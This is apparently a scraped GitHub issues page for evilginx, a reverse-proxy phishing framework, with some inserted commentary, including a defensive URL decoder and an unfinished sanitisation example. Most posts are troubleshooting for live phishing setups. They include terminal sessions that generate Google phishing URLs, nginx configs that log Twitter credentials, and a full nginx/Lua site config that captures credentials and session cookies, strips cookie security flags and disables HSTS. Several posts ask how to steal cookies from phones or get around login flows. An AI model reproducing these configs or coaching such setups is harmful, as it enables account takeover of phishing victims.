kgretzky / evilginx
PLEASE USE NEW VERSION: https://github.com/kgretzky/evilginx2
License: MIT License
I am a noob, so please help me learn.
I enabled google with the domain yourjjjgoogle.com and generated the URL for youtube.com.
Here is what I did in the terminal after installing evilginx:
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py
_ _ _
(_) | (_)
_____ ___| | __ _ _ _ __ __ __
/ _ \ \ / / | |/ _` | | '_ \\ \/ /
| __/\ V /| | | (_| | | | | |> <
\___| \_/ |_|_|\__, |_|_| |_/_/\_\
__/ |
by @mrgretzky |___/ v.1.1.0
usage: evilginx.py [-h] {setup,parse,genurl} ...
evilginx.py: error: too few arguments
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py-h
python: can't open file 'evilginx.py-h': [Errno 2] No such file or directory
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py -h
usage: evilginx.py [-h] {setup,parse,genurl} ...
positional arguments:
{setup,parse,genurl}
setup Configure Evilginx.
parse Parse log file(s).
genurl Generate phishing URL.
optional arguments:
-h, --help show this help message and exit
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py setup
usage: evilginx.py setup [-h] [-d DOMAIN] [--crt CRT] [--key KEY]
[--use_letsencrypt] [-y]
(-l | --enable ENABLE | --disable DISABLE)
evilginx.py setup: error: one of the arguments -l/--list --enable --disable is required
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py setup -d google
usage: evilginx.py setup [-h] [-d DOMAIN] [--crt CRT] [--key KEY]
[--use_letsencrypt] [-y]
(-l | --enable ENABLE | --disable DISABLE)
evilginx.py setup: error: one of the arguments -l/--list --enable --disable is required
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py setup --enable google -d yourgoogle.com
[*] Using domain: yourgoogle.com
[*] Stopping nginx daemon...
[+] Site 'google' enabled.
[?] Do you want to automatically parse all logs every minute? [y/N] y
[+] Logs will be parsed every minute via /etc/crontab.
[?] Do you want to install LetsEncrypt SSL/TLS certificates now? [Y/n] Y
[*] Getting SSL/TLS certificates for following domains:
- yourgoogle.com
- accounts.yourgoogle.com
- ssl.yourgoogle.com
Bootstrapping dependencies for Debian-based OSes... (you can skip this with --no-bootstrap)
Reading package lists... Done
Building dependency tree
Reading state information... Done
gcc is already the newest version.
python is already the newest version.
python-dev is already the newest version.
augeas-lenses is already the newest version.
ca-certificates is already the newest version.
libaugeas0 is already the newest version.
libffi-dev is already the newest version.
libssl-dev is already the newest version.
openssl is already the newest version.
python-virtualenv is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 738 not upgraded.
Creating virtual environment...
Installing Python packages...
Installation succeeded.
Saving debug log to /var/log/letsencrypt/letsencrypt.log
Plugins selected: Authenticator standalone, Installer None
Registering without email!
Obtaining a new certificate
Performing the following challenges:
http-01 challenge for yourgoogle.com
http-01 challenge for accounts.yourgoogle.com
http-01 challenge for ssl.yourgoogle.com
Cleaning up challenges
Problem binding to port 80: Could not bind to IPv4 or IPv6.
IMPORTANT NOTES:
- Your account credentials have been saved in your Certbot
configuration directory at /etc/letsencrypt. You should make a
secure backup of this folder now. This configuration directory will
also contain certificates and private keys obtained by Certbot so
making regular backups of this folder is ideal.
[-] Failed to obtain certificates.
[?] Do you want to auto-renew all obtained SSL/TLS certificates? [Y/n] y
[+] Setting all SSL/TLS certificates to be auto-renewed via /etc/crontab.
[*] Starting nginx daemon...
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py genurl -s google -r https://youtube.com
Generated following phishing URLs:
: https://accounts.yourgoogle.com/ServiceLogin?rc=0aHR0cHM6Ly95b3V0dWJlLmNvbQ
: https://accounts.yourgoogle.com/signin/v2/identifier?rc=0aHR0cHM6Ly95b3V0dWJlLmNvbQ
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py setup --enable google -d yourjjjgoogle.com
[*] Using domain: yourjjjgoogle.com
[*] Stopping nginx daemon...
[+] Site 'google' enabled.
[?] Do you want to automatically parse all logs every minute? [y/N] N
[?] Do you want to install LetsEncrypt SSL/TLS certificates now? [Y/n] N
[?] Do you want to auto-renew all obtained SSL/TLS certificates? [Y/n] N
[*] Starting nginx daemon...
root@pulkitserver:/home/pulkit/Desktop/evilginx# python evilginx.py genurl -s google -r https://youtube.com
Generated following phishing URLs:
: https://accounts.yourjjjgoogle.com/ServiceLogin?rc=0aHR0cHM6Ly95b3V0dWJlLmNvbQ
: https://accounts.yourjjjgoogle.com/signin/v2/identifier?rc=0aHR0cHM6Ly95b3V0dWJlLmNvbQ
root@pulkitserver:/home/pulkit/Desktop/evilginx#
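As an added example (not part of the original issue or the project's own code): a small triage helper that pulls the rc parameter out of URLs like the ones generated above and decodes its destination, so an analyst reviewing such URLs in proxy or mail logs can see where a visitor would be sent afterwards. It assumes the value is one leading character followed by unpadded URL-safe base64, which is what the two URLs above show for https://youtube.com.

```python
"""Decode the redirect parameter carried by URLs like the ones generated above."""
import base64
from urllib.parse import urlparse, parse_qs

# Sample URLs, constructed for this example from the two generated in the session above.
SAMPLE_URLS = [
    "https://accounts.yourgoogle.com/ServiceLogin?rc=0aHR0cHM6Ly95b3V0dWJlLmNvbQ",
    "https://accounts.yourjjjgoogle.com/signin/v2/identifier?rc=0aHR0cHM6Ly95b3V0dWJlLmNvbQ",
]


def decode_redirect_arg(value):
    """Decode one rc value.

    Assumption: the value is a single leading character (a '0' in every URL on
    this page) followed by URL-safe base64 with the padding stripped.
    Returns the decoded text, or None if the value cannot be decoded.
    """
    if len(value) < 2:
        return None
    payload = value[1:]
    payload += "=" * (-len(payload) % 4)  # restore the stripped '=' padding
    try:
        return base64.urlsafe_b64decode(payload).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_redirect(url, arg_name="rc"):
    """Return the decoded redirect destination of a URL, or None if absent."""
    values = parse_qs(urlparse(url).query).get(arg_name)
    if not values:
        return None
    return decode_redirect_arg(values[0])


def triage(urls, arg_name="rc"):
    """Map each URL's host to the destination it would redirect to afterwards."""
    return [(urlparse(u).hostname, extract_redirect(u, arg_name)) for u in urls]


if __name__ == "__main__":
    for host, dest in triage(SAMPLE_URLS):
        print(f"{host} -> {dest}")
```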
Hi @kgretzky
Great project!
Quick question: won't this trigger Google Chrome's phishing detection if opened with Chrome (with usage statistics, etc., enabled)?
I've got everything up and running, but when creds are entered into the site it does not redirect to the rc.
The browser just keeps waiting for a response from the server.
Please can you explain to me why I keep getting this error when I run ./install.sh on terminal and how can I fix it?
/configure: error: the HTTP gzip module requires the zlib library.
You can either disable the module by using --without-http_gzip_module
option, or install the zlib library into the system, or build the zlib library
statically from the source with nginx by using --with-zlib= option.
ERROR: failed to run command: sh ./configure --prefix=/etc/nginx/nginx ...
[-] Failed to configure openresty installation.
I will really appreciate your quick response. Thanks in anticipation.
My mistake, I had set autoparse for all logs during setup.
A strange thing has happened to me: google works fine, but facebook opens up as if I was using my phone, i.e. the site design is not for desktops. Sometimes the links even say m.facebook.com, not facebook.com. How could I fix this?
Hello, thank you for the really helpful update. There is a problem with login.live.com. I tried many things, but as you can see we have some problems in the headers that the proxy sends to live.com.
This is what the proxy sends:
OPTIONS https://login.live.com/GetCredentialType.srf?vv=1600&mkt=EN-US&lc=1033 HTTP/1.1
Host: login.live.com
Connection: keep-alive
Access-Control-Request-Method: POST
Origin: http://login.fakelive.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Access-Control-Request-Headers: content-type, hpgact, hpgid
Accept: */*
Referer: http://login.fakelive.com/
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8
And this is what live.com sends itself:
POST https://login.live.com/GetCredentialType.srf?vv=1600&mkt=EN-US&lc=1033 HTTP/1.1
Host: login.live.com
Connection: keep-alive
Content-Length: 130
hpgid: 0
Accept: application/json
Origin: https://login.live.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
hpgact: 0
Content-type: application/json; charset=UTF-8
Referer: https://login.live.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
Cookie: uaid=***; MSPRequ=lt=***&co=1&id=N; MSPOK=***; CkTst=***
{"username":"@outlook.com","uaid":"","isOtherIdpSupported":false,"checkPhones":true}
There are some problems, like the request being sent as an OPTIONS rather than a POST. Also some headers and the body are missing. Do you have any idea?
Thanks a lot
[/etc/systemd/system/nginx.service:16] Missing
When trying to enable and start the nginx service, I get the above error.
Great work on the automation! Could you add some flags to link to certificates we already have? I'd like to be able to spin everything up without using certbot and without modifying the config files manually.
When I want to install the script, this problem occurs:
This script only supports Ubuntu/Debian.
It doesn't support all Debian.
👍
Hello and thanks for this work,
so I'm sorry for my English.
How do I add a new website in the folder?
What are the important elements to put in to create these kinds of templates?
Thanks.
Masto.
Hi there,
Awesome project you got going on here!
I've been trying to set up a config for Twitter and I'm having a little trouble. I wanted to start small, so right now the focus is just to capture the username and password in the POST request. Thus I've stripped anything I believe to be cookie/SSL related.
My config at the moment is this:
log_format twitter_phish '{"remote_addr":"$remote_addr","time":"$time_local","host":"$http_host","request":"$request","status":"$status","referer":"$http_referer","ua":"$http_user_agent","conn":"$connection","body":"$request_body"}';
location / {
    proxy_pass https://twitter.com/;
    proxy_cookie_domain twitter.com 192.168.60.133;
    proxy_redirect https://twitter.com/ 192.168.60.133/;
    sub_filter 'https://twitter.com/' '192.168.60.133/';
    sub_filter_once off;
    sub_filter_types *;
    proxy_set_header Accept-Encoding "";
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    access_log /var/log/evilginx-twitter.log twitter_phish;
}
As you've probably noticed, I don't have a domain set up yet, so I'm using a VM's IP as a substitute.
I can successfully proxy Twitter. The error happens after I try to log in. A request is sent to https://twitter.com/sessions to validate the form data, and in /var/log/evilginx-twitter.log I can see the credentials. https://twitter.com/sessions is supposed to redirect me to twitter.com after validation, but I get a proxied 404 error. My browser tried to make a request to 192.168.60.133/192.168.60.133/sessions, and that is what I see in my address bar.
I think I might be using the sub_filter directive incorrectly, or perhaps I'm not understanding the proxy. Would I need another config to handle requests/redirects to https://twitter.com/sessions, or am I not doing something right?
Regards
Hello!
Thank you for the amazing tool you are sharing with the world for free, you are doing an amazing job!
The only problem is, there are no tutorials/guides at ALL on how to use the tool. If you do not have coding knowledge, it will be almost impossible to use. There is short documentation on how to install it, but no documentation on, for example, TOR browser support, .onion site support, how to configure it, how to build a new config, etc. Please take this into consideration; a lot of people cannot really use it because of a lack of knowledge.
Thank you.
Installing Evilginx daemon...
Synchronizing state of nginx.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable nginx
Job for nginx.service failed because the control process exited with error code.
See "systemctl status nginx.service" and "journalctl -xe" for details.
[-] Failed to start Nginx daemon.
systemctl status nginx.service
● nginx.service - The NGINX HTTP and reverse proxy server
Loaded: loaded (/etc/systemd/system/nginx.service; enabled; vendor preset: disabled)
Active: failed (Result: exit-code) since Thu 2017-10-12 15:54:09 EDT; 34s ago
CPU: 3ms
Oct 12 15:54:09 aidan-laptop systemd[1]: Starting The NGINX HTTP and reverse proxy server...
Oct 12 15:54:09 aidan-laptop nginx[22458]: nginx: [emerg] dlopen() "/etc/nginx/nginx/modules/ngx_http_au
Oct 12 15:54:09 aidan-laptop nginx[22458]: nginx: configuration file /etc/nginx/nginx.conf test failed
Oct 12 15:54:09 aidan-laptop systemd[1]: nginx.service: Control process exited, code=exited status=1
Oct 12 15:54:09 aidan-laptop systemd[1]: Failed to start The NGINX HTTP and reverse proxy server.
Oct 12 15:54:09 aidan-laptop systemd[1]: nginx.service: Unit entered failed state.
Oct 12 15:54:09 aidan-laptop systemd[1]: nginx.service: Failed with result 'exit-code'.
Help please, running Kali GNU/Linux Rolling.
I get this error while compiling with the latest version of OpenSSL
src/event/ngx_event_openssl.c: In function ‘ngx_ssl_connection_error’:
src/event/ngx_event_openssl.c:2048:21: error: ‘SSL_R_NO_CIPHERS_PASSED’ undeclared (first use in this function)
|| n == SSL_R_NO_CIPHERS_PASSED /* 182 */
^~~~~~~~~~~~~~~~~~~~~~~
src/event/ngx_event_openssl.c:2048:21: note: each undeclared identifier is reported only once for each function it appears in
objs/Makefile:1092: recipe for target 'objs/src/event/ngx_event_openssl.o' failed
make[2]: *** [objs/src/event/ngx_event_openssl.o] Error 1
Version of OpenSSL:
Package: libssl-dev
Source: openssl
Version: 1.1.0e-1
Is there any way I can compile using the older version which is supported?
How do I do it without reinstalling everything?
Connection refused obtaining SSL certificates: PLEASE HELP!!
root@kali:~/Desktop/tools/evilginx# python evilginx.py setup --enable google -d authconfig-gogle.site
_ _ _
(_) | (_)
_____ ___| | __ _ _ _ __ __ __
/ _ \ \ / / | |/ _` | | '_ \\ \/ /
| __/\ V /| | | (_| | | | | |> <
\___| \_/ |_|_|\__, |_|_| |_/_/\_\
__/ |
by @mrgretzky |___/ v.1.1.0
[*] Using domain: authconfig-gogle.site
[*] Stopping nginx daemon...
[+] Site 'google' enabled.
[?] Do you want to automatically parse all logs every minute? [y/N] y
[+] Logs will be parsed every minute via /etc/crontab.
[?] Do you want to install LetsEncrypt SSL/TLS certificates now? [Y/n] y
[*] Getting SSL/TLS certificates for following domains:
IMPORTANT NOTES:
The following errors were reported by the server:
Domain: accounts.authconfig-gogle.site
Type: connection
Detail: Connection refused
Domain: ssl.authconfig-gogle.site
Type: connection
Detail: Connection refused
Domain: authconfig-gogle.site
Type: connection
Detail: Connection refused
To fix these errors, please make sure that your domain name was
entered correctly and the DNS A/AAAA record(s) for that domain
contain(s) the right IP address. Additionally, please check that
your computer has a publicly routable IP address and that no
firewalls are preventing the server from communicating with the
client. If you're using the webroot plugin, you should also verify
that you are serving files from the webroot path you provided.
[-] Failed to obtain certificates.
[?] Do you want to auto-renew all obtained SSL/TLS certificates? [Y/n] n
[*] Starting nginx daemon...
Hello - If I get around to it this will be a Pull request and not an issue.
When you check for special characters in the domain name, you use:
for c in phish_host:
    if not c.isalpha():
        phish_hostname_esc += '%'
    phish_hostname_esc += c
phish_hostnames_esc.append(phish_hostname_esc)
You must change "isalpha()" to "isalnum()" to include numbers; otherwise the domain name will have escape characters inserted in front of every number.
Hi there, just wanted to share my way of trying to install evilginx on Kali Linux: what I have overcome and what I am still having problems with.
Issues:
Oct 15 12:31:22 kali systemd[1]: Starting The NGINX HTTP and reverse proxy server...
Oct 15 12:31:22 kali nginx[25771]: nginx: [emerg] module "/etc/nginx/nginx/modules/ngx_http_auth_pam_module.so" version 1013005 instead of 1011002 in /etc/nginx/modules-enabled/50-mod-http-auth-pam.conf:1
Oct 15 12:31:22 kali nginx[25771]: nginx: configuration file /etc/nginx/nginx.conf test failed
Oct 15 12:31:22 kali systemd[1]: nginx.service: Control process exited, code=exited status=1
Oct 15 12:31:22 kali systemd[1]: Failed to start The NGINX HTTP and reverse proxy server.
Oct 15 12:31:22 kali systemd[1]: nginx.service: Unit entered failed state.
Oct 15 12:31:22 kali systemd[1]: nginx.service: Failed with result 'exit-code'.
Solution: at first I just searched for the missing modules and made symbolic links to where nginx was looking for them, but as you can see that didn't solve the problem, as after the links were created a module version issue occurred :/ I tried to check nginx.conf for any suggestions on module version validation and how to disable it, but failed. Any suggestions? (Sorry for mistakes, this is my first post.)
Hey @kgretzky, I would like to feature Evilginx on Null Byte; I could use your help resolving this issue. I'm getting a "server_name is not terminated by ;" error even though there are semicolons at the ends of each directive. No errors when using the install.sh script.
VPS specs:
$ lsb_release -a
Distributor ID: Debian
Description: Debian GNU/Linux 9.3 (stretch)
Release: 9.3
Codename: stretch
$ uname -a
Linux hostname 4.9.0-5-amd64 #1 SMP Debian 4.9.65-3+deb9u2 (2018-01-04) x86_64 GNU/Linux
Using the following evilginx command:
$ ./evilginx.py setup --enable facebook -d mywebsite.com
_ _ _
(_) | (_)
_____ ___| | __ _ _ _ __ __ __
/ _ \ \ / / | |/ _` | | '_ \\ \/ /
| __/\ V /| | | (_| | | | | |> <
\___| \_/ |_|_|\__, |_|_| |_/_/\_\
__/ |
by @mrgretzky |___/ v.1.1.0
[*] Using domain: mywebsite.com
[*] Stopping nginx daemon...
[+] Site 'facebook' enabled.
[?] Do you want to automatically parse all logs every minute? [y/N] n
[?] Do you want to install LetsEncrypt SSL/TLS certificates now? [Y/n] y
[*] Getting SSL/TLS certificates for following domains:
- mywebsite.com
- www.mywebsite.com
- m.mywebsite.com
Saving debug log to /var/log/letsencrypt/letsencrypt.log
Plugins selected: Authenticator standalone, Installer None
Cert not yet due for renewal
You have an existing certificate that has exactly the same domains or certificate name you requested and isn't close to expiry.
(ref: /etc/letsencrypt/renewal/mywebsite.com.conf)
What would you like to do?
-------------------------------------------------------------------------------
1: Keep the existing certificate for now
2: Renew & replace the cert (limit ~5 per 7 days)
-------------------------------------------------------------------------------
Select the appropriate number [1-2] then [enter] (press 'c' to cancel): 1
Keeping the existing certificate
-------------------------------------------------------------------------------
Certificate not yet due for renewal; no action taken.
-------------------------------------------------------------------------------
[+] Certificates obtained successfully.
[?] Do you want to auto-renew all obtained SSL/TLS certificates? [Y/n] n
[*] Starting nginx daemon...
There are no other server blocks in my nginx.conf:
http {
include /root/evilginx/sites/facebook/*.conf;
....
Errors when starting nginx:
-- Unit nginx.service has begun starting up.
---- hostname nginx[6879]: nginx: [emerg] directive "server_name" is not terminated by ";" in /root/evilginx/sites/facebook/m.facebook.com.conf:7
---- hostname nginx[6879]: nginx: configuration file /etc/nginx/nginx.conf test failed
---- hostname systemd[1]: nginx.service: Control process exited, code=exited status=1
---- hostname systemd[1]: Failed to start The NGINX HTTP and reverse proxy server.
-- Subject: Unit nginx.service has failed
The evilginx/sites/m.facebook.com.conf:
server {
    listen 80;
    listen 443 ssl;
    server_name {{PHISH_HOSTNAME[1]}}; # line 7, server_name terminated by ;
    ssl_certificate {{CERT_PUBLIC_PATH}};
    ssl_certificate_key {{CERT_PRIVATE_PATH}};
    ....
If I manually replace "{{PHISH_HOSTNAME[1]}}" with "mywebsite.com", I'll instead receive a "not terminated by ;" error for the following ssl_certificate* directives. If I delete the mobile conf and try the www conf only, Nginx complains the "{{PHISH_HOSTNAME[0]}}" line wasn't terminated properly. Any idea why this might be happening?
Having an issue generating the LetsEncrypt SSL cert. I'm sure my A Record is configured correctly.
./evilginx.py setup --enable facebook -d my_website.com
IMPORTANT NOTES:
- The following errors were reported by the server:
Domain: my_website.com
Type: unauthorized
Detail: Invalid response from
http://my_website.com/.well-known/acme-challenge/IEf-BPDxSuxxxxxxxxxxxxxxxxxxxxx6gWIWrzrU
[xxx.xxx.xx.xxx]: 404
To fix these errors, please make sure that your domain name was
entered correctly and the DNS A/AAAA record(s) for that domain
contain(s) the right IP address.
- The following errors were reported by the server:
Domain: www.my_website.com
Type: connection
Detail: Fetching
http://www.my_website.com/.well-known/acme-challenge/2dw-LgiFxxxxxxxxxxxxxxxxxxxxIYP-xnCrHw:
Error getting validation data
Domain: m.my_website.com
Type: connection
Detail: DNS problem: NXDOMAIN looking up A for m.my_website.com
To fix these errors, please make sure that your domain name was
entered correctly and the DNS A/AAAA record(s) for that domain
contain(s) the right IP address. Additionally, please check that
your computer has a publicly routable IP address and that no
firewalls are preventing the server from communicating with the
client. If you're using the webroot plugin, you should also verify
that you are serving files from the webroot path you provided.
[-] Failed to obtain certificates.
[?] Do you want to auto-renew all obtained SSL/TLS certificates? [Y/n] n
[*] Starting nginx daemon...
When cloning the evilginx repo, should I clone it to the /var/www/ or /etc/nginx/ directory?
I follow all the necessary steps, but at the point when I try to enable nginx I get this -
systemctl enable nginx
-bash: syntax error near unexpected token `('
root@googlegoogIe:~# systemctl enable nginx
Failed to execute operation: Bad message
systemctl start nginx
Failed to start nginx.service: Unit nginx.service failed to load: Bad message. See system logs and 'systemctl status nginx.service' for details.
● nginx.service - The NGINX HTTP and reverse proxy server
Loaded: error (Reason: Bad message)
Active: inactive (dead)
How to fix this?
Hello @kgretzky, first of all I want to thank you, this tool is really awesome very useful for pentest engagements.
I was testing the google template, and the cookies and credentials are stolen and work like a charm. However, I noticed that the victim is not being logged in after entering the credentials. I mean, they are being redirected to the myaccount page but are not authenticated.
I tried to troubleshoot and all the cookies seem to be OK. However, the last request after authentication is performed (after sending credentials and before being redirected to myaccount.google.com) is not sending the corresponding cookies. I'm suspecting that maybe that's the reason why the victim is not being authenticated.
Is it possible that Google has changed something and that's why it is not working? Could you give me a hand with this?
Thanks man, I would really appreciate your help.
Hi there,
I'm using your awesome tool to create a Dropbox-like site. I set up the site and generate a URL, navigate to the URL, log on, and get redirected (using the Edge browser) to the site I specified (all cool so far).
When I try to parse the logs, I get this:
Parsing logs for site 'dropbox'...
[*] Debug mode on. Log was not truncated!
[+] Found creds: 0
[+] Found tokens: 0
/var/log/evilginx-dropbox.log is empty.
But if I go to /evilginx/logs/dropbox I can see the file created, 20170612_091301_0_tokens.txt, and the password is actually there.
Just tried with Facebook, with same results.
I set up evilginx smoothly. I have an nginx server actively running. I was testing it on my remote desktop server, but when I run the setup of the web link (e.g. google) and genurl, it generates the URL; when I click it, it shows an empty "page not found". I use a VPS with the native IP of the VPS for testing; when I open the link on my local VMware, it shows an empty error page.
@kgretzky thanks for your amazing works!
I have many websites, in many technologies... I need a way to protect them.
I'm wondering if there is just something like a check of suspicious IP activities in the aftermath?
Just this? Really?
Can I check my SSL certificate? HSTS? Avoid serving my site if called from evilnginx?
CSRF protection helps in any way?
Cookies are not captured from smartphones.
The rt cookie is only for web browsers.
Is there any way to get cookies from smartphone devices too?
On my PC it works seamlessly, but on my iPhone it is in a loading loop after entering the username and hitting Next.
First I'll say, great job on this, everything worked out of the box with basically no snags, very cool.
However, I'm having a lot of trouble getting things working for a custom target. The target page is served when I visit the phishing domain, as it should be, but any CSS or JS files are not; for some reason the same login page is being served for each JS or CSS file.
Here are my config and site.conf files.
config

[site]
name=site
site_conf=["site.com.conf"]
creds_conf=site.creds
phish_subdomains=["www1"]
phish_paths=["/blah/blah/login"]
target_hosts=["www1.site.com/cgi-bin/dir/script?PF=IT&REQ=ClientSignin&LANGUAGE=ENGLISH"]
cookie_hosts=["site.com"]
redir_arg=rc
success_arg=rd
log_name=evilginx-site.log
cert_subdomains=["www1"]

site.conf

log_format site_phish '{"remote_addr":"$remote_addr","time":"$time_local","host":"$http_host","request":"$request","status":"$status","referer":"$http_referer","ua":"$http_user_agent","conn":"$connection","cookies":"$http_cookie","set-cookies":"$set_cookies_all","body":"$request_body"}';

server {
    listen 80;
    listen 443 ssl;
    server_name {{PHISH_HOSTNAME[0]}};

    ssl_certificate {{CERT_PUBLIC_PATH}};
    ssl_certificate_key {{CERT_PRIVATE_PATH}};
    ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
    ssl_prefer_server_ciphers on;
    ssl_ciphers 'EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH';

    if ($scheme = http) {
        return 301 https://$server_name$request_uri;
    }

    location / {
        proxy_pass https://{{TARGET_HOST[0]}};
        proxy_cookie_domain {{COOKIE_HOST[0]}} {{PHISH_DOMAIN}};
        proxy_cookie_domain .www1.{{COOKIE_HOST[0]}} .www1.{{PHISH_DOMAIN}};
        proxy_redirect https://{{TARGET_HOST[0]}}/ https://{{PHISH_HOSTNAME[0]}}/;

        sub_filter 'action="https://{{TARGET_HOST[0]}}' 'action="https://{{PHISH_HOSTNAME[0]}}';
        sub_filter 'href="https://{{TARGET_HOST[0]}}' 'href="https://{{PHISH_HOSTNAME[0]}}';
        sub_filter '//{{TARGET_HOST[0]}}' '//{{PHISH_HOSTNAME[0]}}';
        sub_filter_once off;

        set $auth_token "tokenid";

        proxy_set_header Accept-Encoding "";
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

        set_unescape_uri $redir $arg_{{REDIR_ARG}};
        set $set_cookies_all "";

        access_log /var/log/{{LOG_NAME}} site_phish;

        access_by_lua_block {
            if ngx.var.http_origin ~= nil then
                val = string.gsub(ngx.var.http_origin, '{{PHISH_HOSTNAME_ESC[0]}}', '{{TARGET_HOST[0]}}')
                ngx.req.set_header("Origin", val)
            end
            if ngx.var.http_referer ~= nil then
                val = string.gsub(ngx.var.http_referer, '{{PHISH_HOSTNAME_ESC[0]}}', '{{TARGET_HOST[0]}}')
                ngx.req.set_header("Referer", val)
            end
            if ngx.var.http_cookie ~= nil then
                local c_rc = string.match(ngx.var.http_cookie, "{{REDIR_ARG}}=([^;]*)")
                local c_rd = string.match(ngx.var.http_cookie, "{{SUCCESS_ARG}}=([^;]*)")
                if c_rc ~= nil and c_rd ~= nil then
                    ngx.redirect(c_rc)
                end
            end
        }

        header_filter_by_lua_block {
            function get_cookies()
                local cookies = ngx.header.set_cookie or {}
                if type(cookies) == "string" then
                    cookies = {cookies}
                end
                return cookies
            end

            function add_cookie(cookie)
                local cookies = get_cookies()
                table.insert(cookies, cookie)
                ngx.header.set_cookie = cookies
            end

            function exists_cookie(cookie)
                local cookies = get_cookies()
                for i, val in ipairs(cookies) do
                    if string.match(val, "^" .. cookie .. "=") ~= nil then
                        return true
                    end
                end
                return false
            end

            ngx.header["Strict-Transport-Security"] = {}

            if ngx.var.http_origin ~= nil then
                ngx.header["Access-Control-Allow-Origin"] = ngx.var.http_origin
            end

            if ngx.var.redir ~= "" then
                local r_url = ngx.var.redir
                if string.sub(r_url,1,1) == '0' then
                    val = string.sub(ngx.var.redir, 2)
                    r_url = ngx.decode_base64(val)
                end
                add_cookie("{{REDIR_ARG}}=" .. ngx.escape_uri(r_url) .. "; path=/")
            end

            if ngx.header.location then
            end

            if ngx.var.http_cookie ~= nil then
                local c_rc = string.match(ngx.var.http_cookie, "{{REDIR_ARG}}=([^;]*)")
                local c_rd = string.match(ngx.var.http_cookie, "{{SUCCESS_ARG}}=([^;]*)")
                if c_rc ~= nil then
                    if exists_cookie(ngx.var.auth_token) or c_rd ~= nil then
                        ngx.header.location = ngx.unescape_uri(c_rc)
                        add_cookie("{{SUCCESS_ARG}}=true; path=/")
                    end
                end
            end

            if ngx.header.set_cookie then
                local cookies = ngx.header.set_cookie
                if not cookies then return end
                if type(cookies) ~= "table" then cookies = {cookies} end
                local newcookies = {}
                local allcookies = ""
                for i, val in ipairs(cookies) do
                    val = string.gsub(val, '; *[mM]ax%-[aA]ge=[^;]*', "")
                    val = string.gsub(val, '; *[eE]xpires=[^;]*', "")
                    val = string.gsub(val, '; *[sS]ecure', "")
                    table.insert(newcookies, val)
                    if i>1 then allcookies = allcookies .. "||" end
                    allcookies = allcookies .. val
                end
                ngx.header.set_cookie = newcookies
                ngx.var.set_cookies_all = allcookies
            end
        }
    }
}
Also (this is unrelated): in the .conf files for each site, you have sub_filter_types text/html application/json; set unnecessarily; text/html is already set by default. This causes a [warn] duplicate MIME type "text/html" in /etc/nginx/sites-enabled/site.com.conf warning every time the page is requested. Everything still works, but the error.log fills up pretty quickly.
I have set up EvilGinx and generated the URLs.
The URL is https://accounts.security-logs.com
The issue is that after entering E-Mail and clicking NEXT, nothing happens.
Please help.
TIA
Hi,
I am making a config for Yahoo and have a problem with the set-cookie header. It is:
set-cookie: AS=v=1&s=MGDmtRQc; path=/; domain=.login.yahoo.com; secure; HttpOnly
As you see, it has the secure flag. I think the library can't change the domain, so it passes it to the browser with the wrong domain and it can't be set in the cookie storage (our fake domain is e.g. fakeyahoo.com). Do you have any idea?
Thanks
Synchronizing state of nginx.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable nginx
Job for nginx.service failed because the control process exited with error code.
See "systemctl status nginx.service" and "journalctl -xe" for details.
[-] Failed to start Nginx daemon.
Then I type:
nginx -t -c /etc/nginx/nginx.conf
root@loyal:~/Desktop/evilginx# nginx -t -c /etc/nginx/nginx.conf
nginx: [emerg] dlopen() "/etc/nginx/nginx/modules/ngx_http_auth_pam_module.so" failed (/etc/nginx/nginx/modules/ngx_http_auth_pam_module.so: cannot open shared object file: No such file or directory) in /etc/nginx/modules-enabled/50-mod-http-auth-pam.conf:1
nginx: configuration file /etc/nginx/nginx.conf test failed
Any solution? Thanks anyway.
When the phishing link is re-opened, how do I configure it so he/she will sign in again? Thanks
Hi, have you ever looked at Google password reset? I configured the myaccount subdomain, and the problem is that when it verifies the password for the second time you can't get back to your domain and it redirects to their website.
In other words, can we see myaccount.google.com as myaccount.fake.com, with it showing our username so we see that we are logged in?
I want to see the myaccount page that says I am logged in after authorizing (on the fake domain).
Regards
If you send out a link for phishing, this link should consist of a domain and an ID at most:
http://my-site.com/ServiceLogin?id=1234567890
The RC and RT should be mapped in the backend to a unique ID and not presented to the victim, as this drastically reduces the success rate if you see a URL like this:
http://my-site.com/ServiceLogin?rc=http://my-real-site.com/login&rt=Session
I'm using Kali Linux 2017.1 on VMware and the distro is based on Debian... but it still gives this error running
# ./install.sh
Hi,
Would appreciate if you can add a yahoo config to the templates.
Can you also do a tutorial on adding our own configs for sites?
python /root/tools/evilginx/evilginx_parser.py -i /var/log/evilginx-google.log -o /tmp/logs -c google.creds -x
[-] creds config corrupted.
Hello!
It's necessary to filter usernames for special characters: when "/" appears in a username (for example in OWA logins) there is a problem parsing. I replaced "/" and "" with "-" in filenames.
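The report above is a general input-handling problem: a value a remote user controls (the submitted username) ends up in a filename, so path separators in it break parsing or, worse, escape the output directory. As an added example, not the project's own code, here is how a defender would sanitise such a value before it becomes a filename; the function names, the allowed-character policy and the output directory are my own choices.

```python
"""Turn an untrusted username into a safe filename component and verify the final path.
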